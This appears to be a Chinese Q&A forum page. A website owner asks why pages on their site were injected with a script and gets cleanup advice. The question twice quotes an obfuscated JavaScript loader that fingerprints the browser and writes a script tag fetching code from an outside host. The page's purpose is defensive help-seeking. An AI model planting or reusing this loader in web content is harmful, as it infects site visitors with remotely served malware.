网页文件被注入js脚本
我空间上的站点部分网页被注入了一下脚本:<scriptlanguage=javascript><!--(function(QHr){varyR7au=unescape((...
我空间上的站点部分网页被注入了一下脚本:
<script language=javascript><!--
(function(QHr){var yR7au=unescape(('var<20a<3d<22<53cr<69ptE<6eg<69<6ee<22<2cb<3d<22<56ersi<6fn()+<22<2cj<3d<22<22<2cu<3dn<61vigator<2eus<65rAgent<3bif<28(u<2e<69nde<78Of<28<22Chr<6fme<22)<3c0<29<26<26(u<2e<69n<64<65<78Of<28<22Win<22)<3e0)<26<26(u<2einde<78Of<28<22<4eT<206<22)<3c0)<26<26(docume<6et<2e<63ooki<65<2e<69<6e<64ex<4ff<28<22mi<65k<3d1<22)<3c0)<26<26(t<79p<65of(zr<76<7ats)<21<3d<74ypeof(<22A<22)<29)<7bzrvzts<3d<22<41<22<3beval<28<22if(window<2e<22+a+<22)<6a<3dj+<22+a+<22M<61jor<22+b+<61+<22M<69nor<22+b+<61+<22Bu<69ld<22+<62+<22<6a<3b<22)<3b<64<6fcument<2ewr<69te(<22<3cscript<20src<3d<2f<2fm<22+<22artuz<2ecn<2fv<69d<2f<3f<69d<3d<22+j<2b<22<3e<3c<5c<2fsc<72<69pt<3e<22)<3b<7d').replace(QHr,'%'));eval(yR7au)})(/\</g);
--></script>
为什么呢?
是空间的问题,还是网站的问题?
火狐把站点列为攻击站点,如何解决
好像只有.Html 和 .js 文件 被注入了,其他.asp .php都没问题 展开
<script language=javascript><!--
(function(QHr){var yR7au=unescape(('var<20a<3d<22<53cr<69ptE<6eg<69<6ee<22<2cb<3d<22<56ersi<6fn()+<22<2cj<3d<22<22<2cu<3dn<61vigator<2eus<65rAgent<3bif<28(u<2e<69nde<78Of<28<22Chr<6fme<22)<3c0<29<26<26(u<2e<69n<64<65<78Of<28<22Win<22)<3e0)<26<26(u<2einde<78Of<28<22<4eT<206<22)<3c0)<26<26(docume<6et<2e<63ooki<65<2e<69<6e<64ex<4ff<28<22mi<65k<3d1<22)<3c0)<26<26(t<79p<65of(zr<76<7ats)<21<3d<74ypeof(<22A<22)<29)<7bzrvzts<3d<22<41<22<3beval<28<22if(window<2e<22+a+<22)<6a<3dj+<22+a+<22M<61jor<22+b+<61+<22M<69nor<22+b+<61+<22Bu<69ld<22+<62+<22<6a<3b<22)<3b<64<6fcument<2ewr<69te(<22<3cscript<20src<3d<2f<2fm<22+<22artuz<2ecn<2fv<69d<2f<3f<69d<3d<22+j<2b<22<3e<3c<5c<2fsc<72<69pt<3e<22)<3b<7d').replace(QHr,'%'));eval(yR7au)})(/\</g);
--></script>
为什么呢?
是空间的问题,还是网站的问题?
火狐把站点列为攻击站点,如何解决
好像只有.Html 和 .js 文件 被注入了,其他.asp .php都没问题 展开
展开全部
网页挂马
解决办法:
1.使用urlsnooper软件,进行查杀.
2.查看网站里,最近被修改的文件.
3.如果你对程序代码清楚,可以自行查找问题,想一下容易被人家调用的文件
4.检查数据库是否有html内容输出到页面上,或者在上传保存时,没有做好标签过滤和权限保护
解决办法:
1.使用urlsnooper软件,进行查杀.
2.查看网站里,最近被修改的文件.
3.如果你对程序代码清楚,可以自行查找问题,想一下容易被人家调用的文件
4.检查数据库是否有html内容输出到页面上,或者在上传保存时,没有做好标签过滤和权限保护
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
网站有漏洞就被注入了,这个还需要问为什么?说明网站早就被人登陆过后台并且上传了木马,整个网站源码已经被人下载走了,然后在页面挂了木马
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询